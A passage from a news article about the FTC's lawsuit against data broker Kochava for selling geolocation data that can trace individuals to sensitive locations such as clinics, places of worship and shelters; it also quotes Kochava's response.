This means that an exact location can be traced back to a unique individual. Kochava even boasts that one of the possibilities of the datasets is to identify households, for example by tracking where the phones “stay at night”.

This is exactly one of the objections brought up by the FTC. The data is not anonymized and can be used to identify the mobile device’s user or owner. Another reason why this is possible is because other data brokers specifically sell services that work to match Mobile Advertising IDs with offline information, like consumers’ names and physical addresses.

**Sensitive locations**

One of the restrictions the FTC takes a hard stance on are sensitive locations. As we can read in the complaint, the Federal Trade Commission filed the lawsuit against Kochava for selling geolocation data from hundreds of millions of mobile devices that can be used to trace the movements of individuals to and from sensitive locations.

As examples of sensitive locations the FTC lists:

*   reproductive health clinics
*   places of worship
*   homeless and domestic violence shelters
*   addiction recovery facilities

Having such information revealed could expose people to threats of stigma, stalking, discrimination, job loss, and even physical violence, the FTC explained. In an earlier article, we explained why Google has promised to delete location data of trips to sensitive locations.

**Ruling to follow**

The FTC is taking Kochava to court to protect people’s privacy and halt the sale of their sensitive geolocation information. Earlier this month, the FTC announced that it is exploring rules to crack down on harmful commercial surveillance practices that collect, analyze, and profit from information about people. The FTC files a complaint when it has reason to believe that the named defendants are violating or are about to violate the law and it appears to the Commission that a proceeding is in the public interest.

According to Kochava’s management

> “this lawsuit shows the unfortunate reality that the FTC has a fundamental misunderstanding of Kochava’s data marketplace business and other data businesses. Kochava operates consistently and proactively in compliance with all rules and laws, including those specific to privacy.”

The case will be decided by the court. The complaint was filed in the U.S. District Court for the District of Idaho, where Kochava is based.

Tag

#google